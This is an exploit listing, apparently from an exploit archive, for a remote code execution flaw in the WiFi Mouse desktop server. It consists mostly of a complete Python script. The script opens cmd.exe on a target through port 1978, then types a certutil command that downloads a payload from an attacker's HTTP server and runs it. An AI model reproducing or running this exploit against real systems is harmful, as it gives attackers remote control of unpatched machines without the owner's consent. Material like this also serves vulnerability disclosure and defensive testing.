WiFi Mouse Remote Code Execution

Credit: H4rk3nz0
Risk: Medium
Local: No
Remote: Yes

# Exploit Title: WiFi Mouse - Remote Code Execution # Date: 25-02-2021 # Author: H4rk3nz0 # Vendor Homepage: http://necta.us/ # Software Link: http://wifimouse.necta.us/#download # Version: # Tested on: Windows Enterprise Build 17763 ​ # Python 3 port done by RedHatAugust # Original exploit: https://www.exploit-db.com/exploits/49601 # Tested on: Windows 10 Pro Build 15063 ​ # Desktop Server software used by mobile app has PIN option which does not to prevent command input. # Connection response will be 'needpassword' which is only interpreted by mobile app and prompts for PIN input. ​ #!/usr/bin/env python3 ​ from socket import socket, AF_INET, SOCK_STREAM from time import sleep import sys import string ​ target = socket(AF_INET, SOCK_STREAM) port = 1978 ​ try: rhost = sys.argv[1] lhost = sys.argv[2] payload = sys.argv[3] except: print("USAGE: python " + sys.argv[0]+ " <target-ip> <local-http-server-ip> <payload-name>") exit() ​ ​ characters={ "A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e", "O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a", "a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e", "o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a", "1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30", " ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c", ">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a", "(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e", "\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"} ​ ​ def openCMD(): target.sendto(bytes.fromhex("6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a"), (rhost,port)) # openfile /C/Windows/System32/cmd.exe ​ def SendString(string): for char in string: target.sendto(bytes.fromhex("7574663820" + characters[char] + "0a"),(rhost,port)) # Sends Character hex with packet padding sleep(0.03) ​ def SendReturn(): target.sendto(bytes.fromhex("6b657920203352544e"),(rhost,port)) # 'key 3RTN' - Similar to 'Remote Mouse' mobile app sleep(0.5) ​ def exploit(): print("[+] 3..2..1..") sleep(2) openCMD() print("[+] *Super fast hacker typing*") sleep(1) SendString("certutil.exe -urlcache -f http://" + lhost + "/" + payload + " C:\\Windows\\Temp\\" + payload) SendReturn() print("[+] Retrieving payload") sleep(3) SendString("C:\\Windows\\Temp\\" + payload) SendReturn() print("[+] Done! Check Your Listener?") ​ ​ def main(): target.connect((rhost,port)) exploit() target.close() exit() ​ if __name__=="__main__": main()

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